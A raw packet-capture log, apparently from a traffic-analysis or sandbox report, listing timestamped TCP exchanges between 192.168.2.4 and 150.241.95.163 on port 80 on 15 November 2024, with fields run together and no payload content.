                                                                                                                                                                Nov 15, 2024 10:28:31.613886118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.613894939 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.613898993 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.613910913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.613925934 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.613939047 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.617053032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617295980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617358923 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.617520094 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617531061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617764950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617775917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617780924 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.617794037 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617804050 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617815018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617827892 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.617829084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617842913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.617867947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.617867947 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618330002 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618340969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618350983 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618361950 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618369102 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618372917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618383884 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618393898 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618405104 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618417025 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618438005 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618448019 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618458986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618469000 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618469000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618469000 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618469000 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618479967 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618490934 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618500948 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618511915 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.618526936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618526936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.618526936 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.619329929 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.641571045 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.641583920 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.641594887 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.641746044 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.686034918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.686049938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.686068058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.686077118 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.686088085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.686351061 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.696683884 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696695089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696713924 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696726084 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696737051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696748018 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696763992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.696777105 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.697145939 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.699795961 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731255054 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731280088 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731292963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731323004 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731345892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731358051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731369019 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731400013 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731400013 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731415033 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731426001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731446028 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731456995 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731458902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731458902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731458902 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731467962 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731483936 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731496096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731506109 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731518030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731528997 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731528997 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731529951 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731569052 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731584072 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731594086 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731605053 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731615067 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731626987 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731663942 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731663942 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731663942 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731703043 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731714010 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731731892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731741905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731753111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731765032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731797934 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731797934 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731797934 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731833935 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731844902 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731862068 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731872082 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731883049 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731894016 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731898069 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731898069 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731904984 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731915951 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731926918 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731937885 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731949091 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.731969118 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.731969118 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732012033 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732045889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732058048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732058048 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732058048 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732069969 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732110977 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732110977 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732183933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732194901 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732229948 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732239962 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732249975 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732260942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732336998 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732367992 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732378960 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732431889 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732444048 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732469082 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732469082 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732475996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732487917 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732522964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732533932 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732546091 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732584953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732584953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732584953 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732665062 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732675076 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732686996 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732697964 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732708931 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732718945 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732723951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732732058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732742071 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.732786894 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.732786894 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742587090 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742616892 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742631912 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742667913 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742681980 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742697001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742710114 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742711067 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742711067 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742723942 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742762089 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742778063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742778063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742779970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742835045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742845058 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742856979 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742872000 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742885113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742908001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.742923975 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.742923975 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.743001938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743011951 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743026972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743038893 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.743041039 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743052006 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743063927 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743093014 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.743093014 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.743119955 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743132114 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743144035 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.743186951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.743186951 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.764602900 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.764616013 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.764624119 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.764751911 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.809416056 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.809432030 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.809446096 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.809470892 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.809483051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.809495926 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.809508085 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.809597015 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.809597015 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.819921970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.819958925 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.819972038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.819977045 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.819988966 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.819999933 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.820043087 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.820043087 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.820050001 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.820215940 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.821351051 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866009951 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866034031 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866046906 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866058111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866069078 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866081953 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866101027 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866111994 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866122961 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866133928 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866144896 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866157055 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866184950 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866184950 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866184950 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866199970 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866205931 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866213083 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866224051 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866235971 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866293907 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866305113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866314888 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866326094 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866333961 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866333961 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866337061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866390944 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866390944 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866410971 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866421938 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866432905 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866444111 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866456032 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866487026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866487026 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866513014 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866523981 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866530895 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866542101 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866553068 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866569042 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866580963 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866585970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866585970 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866630077 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866636038 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866647959 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866657972 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866667986 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866691113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866702080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866713047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866719961 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866719961 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866724014 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866735935 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866791964 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866791964 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.866902113 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866913080 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866924047 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866934061 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866944075 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866955042 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866966009 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866976976 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866988897 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.866998911 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867006063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867006063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867006063 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867012024 CET8049736150.241.95.163192.168.2.4
                                                                                                                                                                Nov 15, 2024 10:28:31.867059946 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867059946 CET4973680192.168.2.4150.241.95.163
                                                                                                                                                                Nov 15, 2024 10:28:31.867300034 CET8049736150.241.95.163192.168.2.4
